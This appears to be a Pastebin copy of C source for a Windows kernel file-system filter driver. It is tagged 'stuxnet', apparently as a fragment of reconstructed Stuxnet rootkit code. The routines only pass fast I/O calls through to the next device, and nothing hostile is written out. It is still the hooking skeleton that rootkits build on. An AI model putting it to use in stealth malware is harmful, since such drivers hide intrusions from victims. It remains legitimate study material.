API tools faq
paste
Advertisement
FlyFar

Fastlo

FlyFar
Feb 18th, 2023
534
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 20.15 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #include <ntifs.h>
  2.  
  3. typedef struct _DEVICE_EXTENSION
  4. {
  5.   PDEVICE_OBJECT AttachedDevice;
  6.   PETHREAD pThreadObj;
  7.  
  8. }_DEVICE_EXTENSION, *PDEVICE_EXTENSION;
  9. PDEVICE_OBJECT  DeviceObject;
  10.  
  11. //Data:
  12. //-----
  13.  
  14. extern FAST_IO_DISPATCH g_fastIoDispatch;
  15. extern PDRIVER_OBJECT DriverObject;
  16.  
  17. /**-------------------------------------------------------------------
  18.     SetFastIoDispatch
  19. ----------------------------------------------------------------------**/
  20.  
  21.  
  22. PFAST_IO_DISPATCH GetNextIODispatch (PDEVICE_OBJECT DeviceObject,PDEVICE_OBJECT* nextDeviceObject)
  23. {
  24.   if (DeviceObject == 0 || DeviceObject->DeviceExtension == 0)return 0;
  25.    *nextDeviceObject = ((PDEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedDevice;
  26.    return (*nextDeviceObject)->DriverObject->FastIoDispatch;
  27. }
  28.  
  29. BOOLEAN FsFilterFastIoCheckIfPossible(
  30.     __in PFILE_OBJECT       FileObject,
  31.     __in PLARGE_INTEGER     FileOffset,
  32.     __in ULONG              Length,
  33.     __in BOOLEAN            Wait,
  34.     __in ULONG              LockKey,
  35.     __in BOOLEAN            CheckForReadOperation,
  36.     __out PIO_STATUS_BLOCK  IoStatus,
  37.     __in PDEVICE_OBJECT     DeviceObject
  38.     )
  39. {
  40.     PDEVICE_OBJECT nextDeviceObject;
  41.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  42.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 8 || NextFastIoDispatch->FastIoCheckIfPossible == 0){
  43.       return 0;
  44.     };
  45.     return (NextFastIoDispatch->FastIoCheckIfPossible)(
  46.             FileObject,
  47.             FileOffset,
  48.             Length,
  49.             Wait,
  50.             LockKey,
  51.             CheckForReadOperation,
  52.             IoStatus,
  53.             nextDeviceObject);
  54. };
  55.  
  56.  
  57. BOOLEAN FsFilterFastIoRead(
  58.     __in PFILE_OBJECT       FileObject,
  59.     __in PLARGE_INTEGER     FileOffset,
  60.     __in ULONG              Length,
  61.     __in BOOLEAN            Wait,
  62.     __in ULONG              LockKey,
  63.     __out PVOID             Buffer,
  64.     __out PIO_STATUS_BLOCK  IoStatus,
  65.     __in PDEVICE_OBJECT     DeviceObject
  66.     )
  67. {
  68.     //
  69.     //  Pass through logic for this type of Fast I/O
  70.     //
  71.  
  72.    PDEVICE_OBJECT nextDeviceObject;
  73.    PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  74.    if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0xC || NextFastIoDispatch->FastIoRead == 0){
  75.       return FALSE;
  76.     };
  77.         return (NextFastIoDispatch->FastIoRead)(
  78.             FileObject,
  79.             FileOffset,
  80.             Length,
  81.             Wait,
  82.             LockKey,
  83.             Buffer,
  84.             IoStatus,
  85.             nextDeviceObject);
  86. }
  87.  
  88. BOOLEAN FsFilterFastIoWrite(
  89.     __in PFILE_OBJECT       FileObject,
  90.     __in PLARGE_INTEGER     FileOffset,
  91.     __in ULONG              Length,
  92.     __in BOOLEAN            Wait,
  93.     __in ULONG              LockKey,
  94.     __in PVOID              Buffer,
  95.     __out PIO_STATUS_BLOCK  IoStatus,
  96.     __in PDEVICE_OBJECT     DeviceObject
  97.     )
  98. {
  99.     //
  100.     //  Pass through logic for this type of Fast I/O
  101.     //
  102.    PDEVICE_OBJECT nextDeviceObject;  
  103.    PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  104.    if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x10 || NextFastIoDispatch->FastIoWrite == 0){
  105.       return FALSE;
  106.     };
  107.         return (NextFastIoDispatch->FastIoWrite)(
  108.             FileObject,
  109.             FileOffset,
  110.             Length,
  111.             Wait,
  112.             LockKey,
  113.             Buffer,
  114.             IoStatus,
  115.             nextDeviceObject);
  116. }
  117.  
  118. BOOLEAN FsFilterFastIoQueryBasicInfo(
  119.     __in PFILE_OBJECT       FileObject,
  120.     __in BOOLEAN            Wait,
  121.     __out PFILE_BASIC_INFORMATION Buffer,
  122.     __out PIO_STATUS_BLOCK  IoStatus,
  123.     __in PDEVICE_OBJECT     DeviceObject
  124.     )
  125. {
  126.     //
  127.     //  Pass through logic for this type of Fast I/O
  128.     //
  129.     PDEVICE_OBJECT nextDeviceObject;  
  130.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  131.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x14 || NextFastIoDispatch->FastIoQueryBasicInfo == 0){
  132.       return FALSE;
  133.     };
  134.  
  135.         return (NextFastIoDispatch->FastIoQueryBasicInfo)(
  136.             FileObject,
  137.             Wait,
  138.             Buffer,
  139.             IoStatus,
  140.             nextDeviceObject);
  141.    
  142. }
  143.  
  144. BOOLEAN FsFilterFastIoQueryStandardInfo(
  145.     __in PFILE_OBJECT       FileObject,
  146.     __in BOOLEAN            Wait,
  147.     __out PFILE_STANDARD_INFORMATION Buffer,
  148.     __out PIO_STATUS_BLOCK  IoStatus,
  149.     __in PDEVICE_OBJECT     DeviceObject
  150.     )
  151. {
  152.     //
  153.     //  Pass through logic for this type of Fast I/O
  154.     //
  155.     PDEVICE_OBJECT nextDeviceObject;  
  156.    PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  157.    if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x18 || NextFastIoDispatch->FastIoQueryStandardInfo == 0){
  158.       return FALSE;
  159.     };
  160.         return (NextFastIoDispatch->FastIoQueryStandardInfo)(
  161.             FileObject,
  162.             Wait,
  163.             Buffer,
  164.             IoStatus,
  165.             nextDeviceObject);
  166. }
  167.  
  168. BOOLEAN FsFilterFastIoLock(
  169.     __in PFILE_OBJECT       FileObject,
  170.     __in PLARGE_INTEGER     FileOffset,
  171.     __in PLARGE_INTEGER     Length,
  172.     __in PEPROCESS          ProcessId,
  173.     __in ULONG              Key,
  174.     __in BOOLEAN            FailImmediately,
  175.     __in BOOLEAN            ExclusiveLock,
  176.     __out PIO_STATUS_BLOCK  IoStatus,
  177.     __in PDEVICE_OBJECT     DeviceObject
  178.     )
  179. {
  180.     //
  181.     //  Pass through logic for this type of Fast I/O
  182.     //
  183.     PDEVICE_OBJECT nextDeviceObject;  
  184.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  185.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x1C || NextFastIoDispatch->FastIoLock == 0){
  186.       return FALSE;
  187.     };
  188.         return (NextFastIoDispatch->FastIoLock)(
  189.             FileObject,
  190.             FileOffset,
  191.             Length,
  192.             ProcessId,
  193.             Key,
  194.             FailImmediately,
  195.             ExclusiveLock,
  196.             IoStatus,
  197.             nextDeviceObject);
  198. }
  199.  
  200. BOOLEAN FsFilterFastIoUnlockSingle(
  201.     __in PFILE_OBJECT       FileObject,
  202.     __in PLARGE_INTEGER     FileOffset,
  203.     __in PLARGE_INTEGER     Length,
  204.     __in PEPROCESS          ProcessId,
  205.     __in ULONG              Key,
  206.     __out PIO_STATUS_BLOCK  IoStatus,
  207.     __in PDEVICE_OBJECT     DeviceObject
  208.     )
  209. {
  210.     //
  211.     //  Pass through logic for this type of Fast I/O
  212.     //
  213.     PDEVICE_OBJECT nextDeviceObject;  
  214.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  215.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x20 || NextFastIoDispatch->FastIoUnlockSingle == 0){
  216.       return FALSE;
  217.     };
  218.         return (NextFastIoDispatch->FastIoUnlockSingle)(
  219.             FileObject,
  220.             FileOffset,
  221.             Length,
  222.             ProcessId,
  223.             Key,
  224.             IoStatus,
  225.             nextDeviceObject);
  226. }
  227.  
  228. BOOLEAN FsFilterFastIoUnlockAll(
  229.     __in PFILE_OBJECT       FileObject,
  230.     __in PEPROCESS          ProcessId,
  231.     __out PIO_STATUS_BLOCK  IoStatus,
  232.     __in PDEVICE_OBJECT     DeviceObject
  233.     )
  234. {
  235.     //
  236.     //  Pass through logic for this type of Fast I/O
  237.     //
  238.     PDEVICE_OBJECT nextDeviceObject;  
  239.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  240.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x24 || NextFastIoDispatch->FastIoUnlockAll == 0){
  241.       return FALSE;
  242.     };
  243.         return (NextFastIoDispatch->FastIoUnlockAll)(
  244.             FileObject,
  245.             ProcessId,
  246.             IoStatus,
  247.             nextDeviceObject);
  248. }
  249.  
  250. BOOLEAN FsFilterFastIoUnlockAllByKey(
  251.     __in PFILE_OBJECT       FileObject,
  252.     __in PVOID              ProcessId,
  253.     __in ULONG              Key,
  254.     __out PIO_STATUS_BLOCK  IoStatus,
  255.     __in PDEVICE_OBJECT     DeviceObject
  256.     )
  257. {
  258.     //
  259.     //  Pass through logic for this type of Fast I/O
  260.     //
  261.     PDEVICE_OBJECT nextDeviceObject;  
  262.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  263.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x28 || NextFastIoDispatch->FastIoUnlockAllByKey == 0){
  264.       return FALSE;
  265.     };
  266.         return (NextFastIoDispatch->FastIoUnlockAllByKey)(
  267.             FileObject,
  268.             ProcessId,
  269.             Key,
  270.             IoStatus,
  271.             nextDeviceObject);
  272. }
  273.  
  274. BOOLEAN FsFilterFastIoDeviceControl(
  275.     __in PFILE_OBJECT       FileObject,
  276.     __in BOOLEAN            Wait,
  277.     __in_opt PVOID          InputBuffer,
  278.     __in ULONG              InputBufferLength,
  279.     __out_opt PVOID         OutputBuffer,
  280.     __in ULONG              OutputBufferLength,
  281.     __in ULONG              IoControlCode,
  282.     __out PIO_STATUS_BLOCK  IoStatus,
  283.     __in PDEVICE_OBJECT     DeviceObject
  284.     )
  285. {
  286.     //
  287.     //  Pass through logic for this type of Fast I/O
  288.     //
  289.     PDEVICE_OBJECT nextDeviceObject;  
  290.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  291.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x2C || NextFastIoDispatch->FastIoDeviceControl == 0){
  292.       return FALSE;
  293.     };
  294.         return (NextFastIoDispatch->FastIoDeviceControl)(
  295.             FileObject,
  296.             Wait,
  297.             InputBuffer,
  298.             InputBufferLength,
  299.             OutputBuffer,
  300.             OutputBufferLength,
  301.             IoControlCode,
  302.             IoStatus,
  303.             nextDeviceObject);
  304. }
  305.  
  306. VOID FsFilterFastIoDetachDevice(
  307.     __in PDEVICE_OBJECT     SourceDevice,
  308.     __in PDEVICE_OBJECT     TargetDevice
  309.     )
  310. {
  311.     //
  312.     //  Detach from the file system's volume device object.
  313.     //
  314.  
  315.     IoDetachDevice(TargetDevice);
  316.     IoDeleteDevice(SourceDevice);
  317. }
  318.  
  319. BOOLEAN FsFilterFastIoQueryNetworkOpenInfo(
  320.     __in PFILE_OBJECT       FileObject,
  321.     __in BOOLEAN            Wait,
  322.     __out PFILE_NETWORK_OPEN_INFORMATION Buffer,
  323.     __out PIO_STATUS_BLOCK  IoStatus,
  324.     __in PDEVICE_OBJECT     DeviceObject
  325.     )
  326. {
  327.     //
  328.     //  Pass through logic for this type of Fast I/O
  329.     //
  330.     PDEVICE_OBJECT nextDeviceObject;  
  331.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  332.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x3C || NextFastIoDispatch->FastIoQueryNetworkOpenInfo == 0){
  333.       return FALSE;
  334.     };
  335.         return (NextFastIoDispatch->FastIoQueryNetworkOpenInfo)(
  336.             FileObject,
  337.             Wait,
  338.             Buffer,
  339.             IoStatus,
  340.             nextDeviceObject);
  341. }
  342.  
  343. BOOLEAN FsFilterFastIoMdlRead(
  344.     __in PFILE_OBJECT       FileObject,
  345.     __in PLARGE_INTEGER     FileOffset,
  346.     __in ULONG              Length,
  347.     __in ULONG              LockKey,
  348.     __out PMDL*             MdlChain,
  349.     __out PIO_STATUS_BLOCK  IoStatus,
  350.     __in PDEVICE_OBJECT     DeviceObject
  351.     )
  352. {
  353.     //
  354.     //  Pass through logic for this type of Fast I/O
  355.     //
  356.     PDEVICE_OBJECT nextDeviceObject;  
  357.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  358.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x44 || NextFastIoDispatch->MdlRead == 0){
  359.       return FALSE;
  360.     };
  361.         return (NextFastIoDispatch->MdlRead)(
  362.             FileObject,
  363.             FileOffset,
  364.             Length,
  365.             LockKey,
  366.             MdlChain,
  367.             IoStatus,
  368.             nextDeviceObject);
  369. }
  370.  
  371. BOOLEAN FsFilterFastIoMdlReadComplete(
  372.     __in PFILE_OBJECT       FileObject,
  373.     __in PMDL               MdlChain,
  374.     __in PDEVICE_OBJECT     DeviceObject
  375.     )
  376. {
  377.     //
  378.     //  Pass through logic for this type of Fast I/O
  379.     //
  380.     PDEVICE_OBJECT nextDeviceObject;  
  381.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  382.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x48 || NextFastIoDispatch->MdlReadComplete == 0){
  383.       return FALSE;
  384.     };
  385.         return (NextFastIoDispatch->MdlReadComplete)(
  386.             FileObject,
  387.             MdlChain,
  388.             nextDeviceObject);
  389.  
  390. }
  391.  
  392. BOOLEAN FsFilterFastIoPrepareMdlWrite(
  393.     __in PFILE_OBJECT       FileObject,
  394.     __in PLARGE_INTEGER     FileOffset,
  395.     __in ULONG              Length,
  396.     __in ULONG              LockKey,
  397.     __out PMDL*             MdlChain,
  398.     __out PIO_STATUS_BLOCK  IoStatus,
  399.     __in PDEVICE_OBJECT     DeviceObject
  400.     )
  401. {
  402.     //
  403.     //  Pass through logic for this type of Fast I/O
  404.     //
  405.     PDEVICE_OBJECT nextDeviceObject;  
  406.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  407.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x4C || NextFastIoDispatch->PrepareMdlWrite == 0){
  408.       return FALSE;
  409.     };
  410.         return (NextFastIoDispatch->PrepareMdlWrite)(
  411.             FileObject,
  412.             FileOffset,
  413.             Length,
  414.             LockKey,
  415.             MdlChain,
  416.             IoStatus,
  417.             nextDeviceObject);
  418.     return FALSE;
  419. }
  420.  
  421. BOOLEAN FsFilterFastIoMdlWriteComplete(
  422.     __in PFILE_OBJECT       FileObject,
  423.     __in PLARGE_INTEGER     FileOffset,
  424.     __in PMDL               MdlChain,
  425.     __in PDEVICE_OBJECT     DeviceObject
  426.     )
  427. {
  428.     //
  429.     //  Pass through logic for this type of Fast I/O
  430.     //
  431.     PDEVICE_OBJECT nextDeviceObject;  
  432.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  433.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x50 || NextFastIoDispatch->MdlWriteComplete == 0){
  434.       return FALSE;
  435.     };
  436.         return (NextFastIoDispatch->MdlWriteComplete)(
  437.             FileObject,
  438.             FileOffset,
  439.             MdlChain,
  440.             nextDeviceObject);
  441. }
  442.  
  443. BOOLEAN FsFilterFastIoReadCompressed(
  444.     __in PFILE_OBJECT       FileObject,
  445.     __in PLARGE_INTEGER     FileOffset,
  446.     __in ULONG              Length,
  447.     __in ULONG              LockKey,
  448.     __out PVOID             Buffer,
  449.     __out PMDL*             MdlChain,
  450.     __out PIO_STATUS_BLOCK  IoStatus,
  451.     __out struct _COMPRESSED_DATA_INFO* CompressedDataInfo,
  452.     __in ULONG              CompressedDataInfoLength,
  453.     __in PDEVICE_OBJECT     DeviceObject
  454.     )
  455. {
  456.     //
  457.     //  Pass through logic for this type of Fast I/O
  458.     //
  459.     PDEVICE_OBJECT nextDeviceObject;  
  460.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  461.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x54 || NextFastIoDispatch->FastIoReadCompressed == 0){
  462.       return FALSE;
  463.     };
  464.         return (NextFastIoDispatch->FastIoReadCompressed)(
  465.             FileObject,
  466.             FileOffset,
  467.             Length,
  468.             LockKey,
  469.             Buffer,
  470.             MdlChain,
  471.             IoStatus,
  472.             CompressedDataInfo,
  473.             CompressedDataInfoLength,
  474.             nextDeviceObject);
  475. }
  476.  
  477. BOOLEAN FsFilterFastIoWriteCompressed(
  478.     __in PFILE_OBJECT       FileObject,
  479.     __in PLARGE_INTEGER     FileOffset,
  480.     __in ULONG              Length,
  481.     __in ULONG              LockKey,
  482.     __in PVOID              Buffer,
  483.     __out PMDL*             MdlChain,
  484.     __out PIO_STATUS_BLOCK  IoStatus,
  485.     __in struct _COMPRESSED_DATA_INFO*  CompressedDataInfo,
  486.     __in ULONG              CompressedDataInfoLength,
  487.     __in PDEVICE_OBJECT     DeviceObject
  488.     )
  489. {
  490.     //
  491.     //  Pass through logic for this type of Fast I/O
  492.     //
  493.     PDEVICE_OBJECT nextDeviceObject;  
  494.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  495.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x58 || NextFastIoDispatch->FastIoWriteCompressed == 0){
  496.       return FALSE;
  497.     };
  498.         return (NextFastIoDispatch->FastIoWriteCompressed)(
  499.             FileObject,
  500.             FileOffset,
  501.             Length,
  502.             LockKey,
  503.             Buffer,
  504.             MdlChain,
  505.             IoStatus,
  506.             CompressedDataInfo,
  507.             CompressedDataInfoLength,
  508.             nextDeviceObject );
  509.  
  510. }
  511.  
  512. BOOLEAN FsFilterFastIoMdlReadCompleteCompressed(
  513.     __in PFILE_OBJECT       FileObject,
  514.     __in PMDL               MdlChain,
  515.     __in PDEVICE_OBJECT     DeviceObject
  516.     )
  517. {
  518.     //
  519.     //  Pass through logic for this type of Fast I/O
  520.     //
  521.     PDEVICE_OBJECT nextDeviceObject;  
  522.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  523.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x5C || NextFastIoDispatch->MdlReadCompleteCompressed == 0){
  524.       return FALSE;
  525.     };
  526.         return (NextFastIoDispatch->MdlReadCompleteCompressed)(
  527.             FileObject,
  528.             MdlChain,
  529.             nextDeviceObject);
  530.    
  531. }
  532.  
  533. BOOLEAN FsFilterFastIoMdlWriteCompleteCompressed(
  534.     __in PFILE_OBJECT       FileObject,
  535.     __in PLARGE_INTEGER     FileOffset,
  536.     __in PMDL               MdlChain,
  537.     __in PDEVICE_OBJECT     DeviceObject
  538.     )
  539. {
  540.     //
  541.     //  Pass through logic for this type of Fast I/O
  542.     //
  543.     PDEVICE_OBJECT nextDeviceObject;  
  544.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  545.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x60 || NextFastIoDispatch->MdlWriteCompleteCompressed == 0){
  546.       return FALSE;
  547.     };
  548.         return (NextFastIoDispatch->MdlWriteCompleteCompressed)(
  549.             FileObject,
  550.             FileOffset,
  551.             MdlChain,
  552.             nextDeviceObject);
  553.    
  554. }
  555.  
  556. BOOLEAN FsFilterFastIoQueryOpen(
  557.     __in PIRP               Irp,
  558.     __out PFILE_NETWORK_OPEN_INFORMATION NetworkInformation,
  559.     __in PDEVICE_OBJECT     DeviceObject
  560.     )
  561. {
  562.     //
  563.     //  Pass through logic for this type of Fast I/O
  564.     //
  565.     PDEVICE_OBJECT nextDeviceObject;  
  566.     PFAST_IO_DISPATCH NextFastIoDispatch = GetNextIODispatch(DeviceObject,&nextDeviceObject);
  567.     if ( NextFastIoDispatch == 0 || NextFastIoDispatch->SizeOfFastIoDispatch <= 0x64 || NextFastIoDispatch->FastIoQueryOpen == 0){
  568.       return FALSE;
  569.     };
  570.     return (NextFastIoDispatch->FastIoQueryOpen)(
  571.             Irp,
  572.             NetworkInformation,
  573.             nextDeviceObject);
  574. }
  575.  
  576. VOID SetFastIoDispatch(){
  577.     g_fastIoDispatch.SizeOfFastIoDispatch     = sizeof(FAST_IO_DISPATCH);
  578.     g_fastIoDispatch.FastIoCheckIfPossible    = FsFilterFastIoCheckIfPossible;
  579.     g_fastIoDispatch.FastIoRead               = FsFilterFastIoRead;
  580.     g_fastIoDispatch.FastIoWrite              = FsFilterFastIoWrite;
  581.     g_fastIoDispatch.FastIoQueryBasicInfo     = FsFilterFastIoQueryBasicInfo;
  582.     g_fastIoDispatch.FastIoQueryStandardInfo  = FsFilterFastIoQueryStandardInfo;
  583.     g_fastIoDispatch.FastIoLock               = FsFilterFastIoLock;
  584.     g_fastIoDispatch.FastIoUnlockSingle       = FsFilterFastIoUnlockSingle;
  585.     g_fastIoDispatch.FastIoUnlockAll          = FsFilterFastIoUnlockAll;
  586.     g_fastIoDispatch.FastIoUnlockAllByKey     = FsFilterFastIoUnlockAllByKey;
  587.     g_fastIoDispatch.FastIoDeviceControl      = FsFilterFastIoDeviceControl;
  588.     g_fastIoDispatch.FastIoDetachDevice       = FsFilterFastIoDetachDevice;
  589.     g_fastIoDispatch.FastIoQueryNetworkOpenInfo = FsFilterFastIoQueryNetworkOpenInfo;
  590.     g_fastIoDispatch.MdlRead            = FsFilterFastIoMdlRead;
  591.     g_fastIoDispatch.MdlReadComplete          = FsFilterFastIoMdlReadComplete;
  592.     g_fastIoDispatch.PrepareMdlWrite          = FsFilterFastIoPrepareMdlWrite;
  593.     g_fastIoDispatch.MdlWriteComplete         = FsFilterFastIoMdlWriteComplete;
  594.     g_fastIoDispatch.FastIoReadCompressed     = FsFilterFastIoReadCompressed;
  595.     g_fastIoDispatch.FastIoWriteCompressed    = FsFilterFastIoWriteCompressed;
  596.     g_fastIoDispatch.MdlReadCompleteCompressed = FsFilterFastIoMdlReadCompleteCompressed;
  597.     g_fastIoDispatch.MdlWriteCompleteCompressed = FsFilterFastIoMdlWriteCompleteCompressed;
  598.     g_fastIoDispatch.FastIoQueryOpen          = FsFilterFastIoQueryOpen;
  599.     DriverObject->FastIoDispatch              =  &g_fastIoDispatch;
  600. };
Tags: stuxnet
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!